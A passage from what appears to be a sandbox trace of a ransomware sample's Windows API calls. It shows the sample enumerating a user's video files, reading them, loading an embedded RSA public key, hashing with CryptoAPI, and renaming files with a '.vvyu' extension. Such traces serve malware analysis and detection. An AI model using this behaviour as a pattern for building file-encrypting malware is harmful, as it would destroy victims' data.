lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.700] CloseHandle (hObject=0x584) returned 1 [0198.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0198.702] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\Kb5Yp2q.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\kb5yp2q.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\Kb5Yp2q.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\kb5yp2q.avi.vvyu")) returned 1 [0198.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.713] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0198.716] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a23d80, ftCreationTime.dwHighDateTime=0x1d8a5f8, ftLastAccessTime.dwLowDateTime=0xba0d0f10, ftLastAccessTime.dwHighDateTime=0x1d8a706, ftLastWriteTime.dwLowDateTime=0xba0d0f10, ftLastWriteTime.dwHighDateTime=0x1d8a706, nFileSizeHigh=0x0, nFileSizeLow=0x16fba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m0ZRF.mkv", cAlternateFileName="")) returned 1 [0198.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0198.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.717] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\m0ZRF.mkv") returned=".mkv" [0198.717] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\m0ZRF.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\m0zrf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.718] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=94138) returned 1 [0198.718] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.721] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16f94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.721] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.724] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.724] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16fba, lpOverlapped=0x0) returned 1 [0198.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.725] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0198.726] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.726] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.726] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.726] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.726] GetLastError () returned 0x0 [0198.726] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.726] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0198.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.727] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.727] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.727] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16fc0) returned 0x2af7168 [0198.727] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aead58 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeada0 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.729] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69b0 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6998 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.732] GetCurrentThreadId () returned 0x5d8 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5690 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.732] GetCurrentThreadId () returned 0x5d8 [0198.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0198.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69b0 [0198.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a10 [0198.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a28 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69c8 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6998 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeada0 | out: hHeap=0x2c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 